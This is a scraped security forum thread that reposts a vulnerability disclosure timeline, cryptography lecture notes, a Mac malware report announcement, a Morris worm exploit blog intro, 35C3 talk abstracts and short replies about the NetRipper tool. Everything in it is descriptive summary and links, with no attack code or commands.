sent an initial notification to services@gigabyte and services@gigabyteusa and requested for a security contact in order to send a draft advisory. 2018-04-26: SecureAuth sent the initial notification to sales@gigabyteusa and marketing@gigabyteusa and requested for a security contact in order to send a draft advisory. 2018-04-30: Gigabyte Technical support team answered saying the notification was too general and requested SecureAuth to open a ticket in the Support portal. 2018-05-02: SecureAuth replied that it's our policy to keep all the communication process via email in order to track all interactions. For that reason, SecureAuth notified Gigabyte again that a draft advisory, including a technical description, had been written and requested for a security contact to send it. 2018-05-04: Gigabyte Technical support team replied saying that Gigabyte is a hardware company and they are not specialized in software, and requested for technical information. 2018-05-04: In the absence of a security contact, SecureAuth sent to Gigabyte Technical support team the draft advisory including a technical description and POCs. 2018-05-15: SecureAuth requested a status update. 2018-05-16: Gigabyte Technical support team answered that Gigabyte is a hardware company and they are not specialized in software. They requested for technical details and tutorials to verify the vulnerabilities. 2018-05-16: SecureAuth requested for a formal acknowledgment of the draft advisory sent. 2018-05-16: Gigabyte replied saying that the draft advisory was general and asked for a personal contact. 2018-05-17: SecureAuth notified Gigabyte again that is our policy to keep all the communication process via email. 2018-05-31: SecureAuth requested a status update. 2018-05-16: Gigabyte replied saying that the draft advisory was general and asked for a phone contact again. 2018-05-31: SecureAuth requested for a formal acknowledgment of the draft advisory sent multiple times, in order to engage into a coordinated vulnerability disclosure process. 2018-07-03: SecureAuth requested a status update. 2018-07-12: Gigabyte responded that, according to its PM and engineers, its products are not affected by the reported vulnerabilities. 2018-12-18: Advisory CORE-2018-0007 published as 'user release'. 9. References [1] https://www.gigabyte.com/About 10. About SecureAuth Labs SecureAuth Labs, the research arm of SecureAuth Corporation, is charged with anticipating the future needs and requirements for information security technologies. We conduct research in several important areas of computer security, including identity-related attacks, system vulnerabilities and cyber-attack planning. Research includes problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. We regularly publish security advisories, primary research, technical publications, research blogs, project information, and shared software tools for public use at http://www.secureauth.com/ 11. About SecureAuth SecureAuth is leveraged by leading companies, their employees, their customers and their partners to eliminate identity-related breaches. As a leader in access management, identity governance, and penetration testing, SecureAuth is powering an identity security revolution by enabling people and devices to intelligently and adaptively access systems and data, while effectively keeping bad actors from doing harm. By ensuring the continuous assessment of risk and enablement of trust, SecureAuth's highly flexible Identity Security Automation (ISA) platform makes it easier for organizations to prevent the misuse of credentials and exponentially reduce the enterprise threat surface. To learn more, visit www.secureauth.com, call (949) 777-6959, or email us at info@secureauth.com 12. Disclaimer The contents of this advisory are copyright (c) 2018 SecureAuth, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ Sursa: https://www.secureauth.com/labs/advisories/gigabyte-drivers-elevation-privilege-vulnerabilities
-
An Intensive Introduction to Cryptography Boaz Barak Work in progress These are lecture notes for lecture notes for an introductory but fast-paced undergraduate/beginning graduate course on cryptography. I am using these notes for Harvard CS 127. You can also download all lecture notes in a single PDF file. If you have any comments, suggestions, typo fixes, etc.. I would be very grateful if you post them as an issue or pull request in the GitHub repository where I am maintaining the source files for these notes. Lectures 0 Preface (pdf version) 0.5 Mathematical background (pdf version) 1 Introduction (pdf version) 2 Computational security (pdf version) 3 Pseudorandom generators (pdf version) 4 Pseudorandom functions (pdf version) 5 Pseudorandom functions from pseudorandom generators (pdf version) 6 Chosen ciphertext security (pdf version) 7 Hash functions, proofs of work and cryptocurrencies (pdf version) 8 More hash functions (pdf version) 9 Public key cryptography (pdf version) 10 Concrete public key schemes (pdf version) 11 Lattice based cryptography (pdf version) 12 Chosen Ciphertext Security for Public Key Encryption (pdf version) 13 Establishing secure communication channels (pdf version) 14 Zero knowledge proofs (pdf version) 15 Fully homomorphic encryption (pdf version) 16 Fully homomorphic encryption II (pdf version) 17 Multiparty secure computation (pdf version) 18 Multiparty secure computation II (pdf version) 19 Quantum computing and cryptography (pdf version) 20 Quantum computing and cryptography II (pdf version) 21 Software obfuscation (pdf version) 22 Software obfuscation II (pdf version) 23 Anonymous routing (pdf version) 24 Cryptography morality and policy (pdf version) 25 Course recap (pdf version) Sursa: https://intensecrypto.org/public/index.html
-
- 1
-
-
Report: The Mac Malware of 2018 ?? Aloha Patrons! Over the last few weeks, I've be diligently working on my annual "Mac Malware of the Year" report. It's been a rather encyclopedic effort as it includes an in-depth overview all new Mac malware (and adware) of 2018. But hooray - it's now complete ? For each specimen the report details the malware's: infection vector persistence mechanism payload and capabilities ...oh and you can also download each and every specimen to play with! Just don't infect yourself ? Read: "The Mac Malware of 2018" ? PDF format ( https://objective-see.com/downloads/MacMalware_2018.pdf ) ? Blog Format ( https://objective-see.com/blog/blog_0x3C.html ) Enjoy! And mahalo for you continuing 2019 support!! ♥️ -patrick Sursa: https://www.patreon.com/posts/23697586
-
This blog is the 10th post in our annual 12 Days of HaXmas series. A couple of months ago, we paid tribute to the 30th anniversary of the Morris worm by dropping three new modules for it: A buffer overflow in fingerd(8) A VAX reverse shell A command injection in Sendmail’s debug code All of these vulnerabilities were exploited by the worm in 1988. In this post, we will dive into the exploit development process for those modules, beginning our journey by building a 4.3BSD system for testing, and completing it by retracting the worm author’s steps to RCE. By the end of this post, it will hopefully become clear how even 30-year-old vulns can still teach us modern-day fundamentals. Background Let’s start with a little history on how this strange project came to be. I recall reading about the Morris worm on VX Heaven. It was many years ago, and some of you may still remember that site. Fast-forward to 2018, and I had forgotten about the worm until I had the opportunity to finish Cliff Stoll’s hacker-tracker epic, “The Cuckoo’s Egg.” In the epilogue, Stoll recounts fighting the first internet worm. Notably, the worm exercised what was arguably the first malicious buffer overflow in the wild. It also exploited a command injection in Sendmail’s debug mode, which was normally used by administrators to debug mail problems. And even beyond the technical, the worm resulted in what was the first conviction under the Computer Fraud and Abuse Act (CFAA)—a precedent with lasting effects today. Feeling inspired, I began a side project to see whether I could replicate the worm’s exploits using period tools. But first, I needed a system. Articol complet: https://blog.rapid7.com/2019/01/02/the-ghost-of-exploits-past-a-deep-dive-into-the-morris-worm/
-
This talk aims to give a general overview of iOS Jailbreaking by starting at what jailbreaking was back in the days and how it evolved up until today, while also taking a quick look at how it might evolve in future. Therefore the following topics are covered: - Jailbreaking goals (technical) - Types of jailbreak and it's origins (tethered, untethered, semi-tethered, semi-untethered) - Exploit mitigations (ASLR, iBoot-level AES, KPP, KTRR, PAC) - Kernel patches (h3lix) - Kppless jailbreaks The goal is to give an insight into the jailbreak terminology, exploit mitigations and how these are dealt with in past and modern jailbreaks. I will give an introduction in jailbreak terminology and walk through the jailbreak history, thus presenting how iOS devices have been hacked/jailbroken in the past while focusing on what mitigations Apple added over the years. Therefore i will discuss what effects these mitigations have on jailbreaking and how they were (and still are) dealt with. This should be interesting for hackers new in the iOS game, as several technical aspects are covered, but also for people who jailbreak their devices and want to get a better understanding of what is happening under the hood of jailbreaks as well as what challenges hackers have to face and why things evoled the way they are right now. This talk is structured somewhat similar to my previous talk 2 years ago "iOS Downgrading - From past to present". Watching my previous talk is not neccessary for understanding this one, but is suggested to get a better overall image of iOS hacking.
-
We all know what FAX is, and for some strange reason most of us need to use it from time to time. Hard to believe its 2018, right? But can FAX be something more than a bureaucratic burden? Can it actually be a catastrophic security hole that may be used to compromise your entire network? Come watch our talk and find out … Unless you've been living under a rock for the past 30 years or so, you probably know what a fax machine is. For decades, fax machines were used worldwide as the main way of electronic document delivery. But this happened in the 1980s. Humanity has since developed far more advanced ways to send digital content, and fax machines are all in the past, right? After all, they should now be nothing more than a glorified museum item. Who on earth is still using fax machines? The answer, to our great horror, is EVERYONE. State authorities, banks, service providers and many others are still using fax machines, despite their debatable quality and almost non-existent security. In fact, using fax machines is often mandatory and considered a solid and trustworthy method of delivering information. What the Fax?! We embarked on a journey with the singular goal of disrupting this insane state of affairs. We went to work, determined to show that the common fax machine could be compromised via mere access to its fully exposed and unprotected telephone line – thus completely bypassing all perimeter security protections and shattering to pieces all modern-day security concepts. Join us as we take you through the strange world of embedded operating systems, 30-year-old protocols, museum grade compression algorithms, weird extensions and undebuggable environments. See for yourself first-hand as we give a live demonstration of the first ever full fax exploitation, leading to complete control over the entire device as well as the network, using nothing but a standard telephone line. This talk is intended to be the canary in the coal mine. The technology community cannot sit idly by while this ongoing madness is allowed to continue! The world must stop using FAX!
-
- 1
-
-
In this talk, we’re looking at third party tracking on Android. We’ve captured and decrypted data in transit between our own devices and Facebook servers. It turns out that some apps routinely send Facebook information about your device and usage patterns - the second the app is opened. We’ll walk you through the technical part of our analysis and end with a call to action: We believe that both Facebook and developers can do more to avoid oversharing, profiling and damaging the privacy of their users. In this talk, we’re looking at third party tracking on Android. We’ve captured and decrypted data in transit between our own devices and Facebook servers. It turns out that some apps routinely send Facebook information about your device and usage patterns - the second the app is opened. We’ll walk you through the technical part of our analysis and end with a call to action: We believe that both Facebook and developers can do more to avoid oversharing, profiling and damaging the privacy of their users.
-
Pursuit of “good customers’ experience“ not only leads to new customers, but also attract criminals of all sorts. Presentation will give overview of current security situation of ATMs with different auxiliary devices allowing cardless transactions. Cardless is new sexy for criminals. Era of ATMs has started in London in 1967. Since time, when the “hole-in-the-wall” cash machine used radiocarbon paper cheques, ATMs became more complex and smart, providing opportunity to withdraw money without cards. Vendors, in accordance to banks and consumer’s demand, create ATMs that replace plastic cards and PINs with smartphones or QR codes. Cash withdrawal from an ATM now easier than never before not only for clients, but also for attackers. Jackpotting an ATM via malware or black box are pretty familiar. Countermeasures against such attacks are already in place in many banks. Thus, attackers need to discover new (or well-forgotten) ways to achieve their evil goals. We will not chew the fat, telling stories about the old days, because new functionality provides new possibilities. Migration from Windows XP to Windows 7/10 means there is always PowerShell on the ATM. “New” types of input devices allow BadBarcode-like attacks. Legitimate auxiliary device connected to the ATM in pursuit of so-called good customers’ experience may lead to ejection of all money from ATM.
-
This talk will teach you the fundamentals of machine learning and give you a sneak peek into the internals of the mystical black box. You'll see how crazy powerful neural networks can be and understand why they sometimes fail horribly. Computers that are able to learn on their own. It might have sounded like science-fiction just a decade ago, but we're getting closer and closer with recent advancements in Deep Learning. Or are we? In this talk, I'll explain the fundamentals of machine-learning in an understandable and entertaining way. I'll also introduce the basic concepts of deep learning. With the current hype of deep learning and giant tech companies spending billions on research, understanding how those methods works, knowing the challenges and limitations is key to seeing the facts behind the often exaggerated headlines. One of the most common applications of deep learning is the interpretation of images, a field that has been transformed significantly in recent years. Applying neural networks to image data helps visualising and understanding many of the faults as well as advantages of machine learning in general. As a research scientist in the field of automated analysis of bio-medical image data, I can give you some insights into these as well as some real-world applications.
-
Since a few months we have a new version of TLS, the most important encryption protocol on the Internet. From the vulnerabilities that created the need of a new TLS version to the challenges of deploying it due to broken devices this talk will give an overview of the new TLS 1.3. In August the new version 1.3 of the Transport Layer Security (TLS) protocol was released. It‘s the result of a process that started over four years ago when it became increasingly clear that previous TLS versions suffered from some major weaknesses. In many ways TLS 1.3 is the biggest step ever done in the history of TLS and its predecessor SSL. While previous TLS versions always tried to retain compatibility and not change too many things, the new version radically removes problematic and insecure constructions like static RSA key exchanges, fragile CBC/HMAC constructions and broken hash functions like MD5 and SHA1. As a bonus TLS 1.3 comes with a reworked handshake that reduces the number of round-trips and thus provides not just more security, but also better performance. If that sounds too good to be true: An optional, even faster mode of TLS 1.3 – the zero round trip or 0RTT mode – makes some security researchers worried, because they fear it introduces new security risks due to replay attacks. Though the road to TLS 1.3 was complicated. The Internet is a buggy place and particularly Enterprise devices of all kinds – middleboxes, TLS-terminating servers and TLS-interception devices – slowed down the deployment and finalization of the new encryption protocol. Also some banks thought that TLS 1.3 is too secure for them. The talk will give an overview of the developments that led to TLS 1.3, the major changes it brings, the challenges it had to face and some practical advice for deployment.
-
Often, when doing reverse engineering projects, one needs to import symbols from Open Source or «leaked» code bases into IDA databases. What everybody does is to compile to binary, diff and import the matches. However, it is often problematic due to compiler optimizations, flags used, etc… It can be even impossible because old source codes do not compile with newer compilers or, simply, because there is no full source, just partial source code. During the talk, I will discuss algorithms for importing symbols *directly* from C source codes into IDA databases and release a tool (that will run, most likely, on top of Diaphora) for doing so.
-
Mai lasati sarmalele si faceti ceva util: https://streaming.media.ccc.de/35c3/relive
- 1 reply
-
- 3
-
-
-
-
Streaming: http://streaming.media.ccc.de/35c3 Schedule: https://fahrplan.events.ccc.de/congress/2018/Fahrplan/ Ca in fiecare an, sunt multe prezentari interesante. PS: Nu sunt doar prezentari de "security", dar cele care sunt, merita vazute.
- 1 reply
-
- 3
-
-
[RST] NetRipper - Smart traffic sniffing for penetration testers
Nytro replied to Nytro's topic in Proiecte RST
Da, e in CrackMapExec, insa nu i-a mai facut update de o gramada de timp. L-am cunoscut pe byt3bl33d3r la BlackHat Asia, e super de treaba, a zis ca o sa ii faca update, dar probabil a uitat. Poate ii mai aduc eu aminte. Este si in PTF, dar la fel, nu e updated https://github.com/trustedsec/ptf/tree/master/modules/windows-tools -
[RST] NetRipper - Smart traffic sniffing for penetration testers
Nytro replied to Nytro's topic in Proiecte RST
NetRipper - Added support for Opera and SecureCRT https://github.com/NytroRST/NetRipper